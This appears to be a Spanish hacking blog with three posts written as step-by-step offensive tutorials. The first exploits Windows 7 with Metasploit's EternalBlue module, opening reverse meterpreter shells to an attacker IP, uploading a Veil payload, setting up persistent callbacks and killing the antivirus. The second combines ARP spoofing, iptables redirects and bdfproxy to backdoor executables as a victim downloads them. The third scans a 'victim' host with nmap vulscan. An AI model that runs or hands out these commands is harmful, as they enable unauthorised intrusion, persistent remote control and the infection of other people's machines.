viernes, 28 de julio de 2017

Intrusión a Windows 7 + bypass UAC + persistencia

Hola amigos, en el post de hoy vamos a hackear Windows 7 64 bits a través del exploit eternal blue, sin embargo, con él, se puede hackear también Windows 8 y Windows 10 (hasta Redstone 1) además, nos saltaremos el uac control y le añadiremos persistencia, para que podamos volver a tener acceso a él, aunque el dueño apague el ordenador.

En primer lugar, vamos a actualizar metasploit

apt-get install metasploit-framework

o bien

msfupdate

Iniciamos metasploit

msfconsole



use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.134

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.131

exploit



getuid



getsystem



Creamos un payload con veil (en otro puerto distinto, por ejemplo, el 4448), os aconsejo en ruby. Lo llamaré eternalblue.

Abrimos un nueva sesión de msfconsole con el handler que nos creó veil.

msfconsole -r /usr/share/veil-output/handlers/eternalblue.rc

En la primera sesión de metasploit, lo subimos (si no podéis subirlo al directorio en el que estéis, probad otro).

upload c:/usr/share/veil-output/compiled/eternalblue.exe

Y ejecutamos:

execute -f c:/directorio_payload_veil_subido/eternalblue.exe

Nos pasamos al metasploit de veil, nos habrá abierto una sesión de meterpreter

Configuramos la persistencia:

En primer lugar, copiamos eternalblue.exe a otro archivo distinto, eternalblue2 (no borres el primero, sólo copialo)

background

use post/windows/manage/persistence_exe

set REXENAME eternalblue2.exe

set REXEPATH /usr/share/veil-output/compiled/eternalblue2.exe

set STARTUP SYSTEM

Os cuento: en STARTUP debemos meter lo que nos ha salido cuando hicimos el getuid, bien USER,SYSTEM o SERVICE.

El módulo, subirá el payload eternalblue.exe de la máquina atacante a la vícitima y lo nombrará (en la víctima) como eternalblue2.exe.



Para más información sobre el módulo, info post/windows/manage/persistence_exe

Ejecutamos el módulo:

run

Si os sale un error, diciendo que stdapy está ejecutándose, cerrad la sesión que sacamos con el exploit eternalblue.

Otra opción para crear la persistencia, si usas un kali más antiguo, es persistence:

run persistence -U -i 10 -p 4444 -r 192.168.1.131

-U: Cuando el usuario comprometido abra su sesión, se ejecutará.
-p: Puerto del equipo atacante que estará a la escucha.
-r: ip del atacante.
-i: Tiempo en segundos que esperará para intentar una nueva conexión, en nuestro caso, si no ha sido capaz de crear la conexión con el atacante, esperará 10 segundos.

Más opciones haciendo run persistence -h

Ah, para matar el antivirus run killav o bien con el módulo post/windows/manage/killav

lunes, 17 de julio de 2017

Tutorial bdfproxy

En este nuevo post, vamos a hacer que, cuando una víctima se descargue un programa, poder infectarlo al vuelo (mientras se lo descarga).

PDFProxy, lo que hace, es buscar code caves en la cabecera PE del ejecutable en las que quepa el código de la shell, lo inyectará y lo dejará preparado para que, posteriormente, se continúe cargando el programa infectado volviendo de nuevo a los registros pertinentes.

apt-get install mitmproxy

Si sale un error sobre dradis, hay que desinstalar dradis: apt-get purge dradis


apt-get install bdfproxy

Instalamos también

apt-get install python-openssl
apt-get install openssl

Editamos el archivo de configuración de bdf proxy (bdfproxy.cfg) y lo configuramos a nuestro modo, cambiando la dirección IP que viene por la nuestra.

También, ponemos la opción:

proxymode=transparent

Guardamos y cerramos.

Preparamos el ataque mitm:

echo 1 > /proc/sys/net/ipv4/ip_forward

En otra ventana:

Configuramos el firewall:

iptables --flush

iptables --table nat --flush

iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 443 -j REDIRECT –to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 8443 -j REDIRECT –to-port 8080

Realizamos el envenenamiento arp:

arpspoof -i eth0 -t ipvictima iproutet

En otra ventana:

arpspoof -i interfazdered -t iprouter ipvictima

Abrimos una nueva terminal

Ejecutamos bdfproxy:

bdfproxy

Nos ha creado el archivo /etc/bdfproxy/bdf_proxy_resource.rc que es una especie de script que nos configura metasploit para preparar la escucha.

En una ventana nueva ejecutamos metasploit con el archivo indicado anteriormente.

msfconsole -r /etc/bdfproxy/bdfproxy/bdf_proxy_resource.rc

Cuando la víctima se descargue el programa, se autoinyectará



sábado, 8 de julio de 2017

Esceno de vulnerabilidades con nmap

Hola amigos.

Hoy, vamos a ver un script de nmap que nos va a servir como escaneador de vulnerabilidades.

En primer lugar, nos descargamos


O bien podéis ir a la página https://github.com/scipag/vulscan y descargárlo todo



Y copiamos todos los archivos a /usr/share/nmap/scripts/vulscan

El siguiente paso es escanear:

nmap -sV --script=vulscan/vulscan.nse ip_victima



También podemos especificar una base de datos concreta con

--script-args vulscandb=tu_base_de_datos

¿Cómo podríamos actualizar la base de datos?

En la página https://github.com/scipag/vulscan vienen los enlaces de las bases de datos.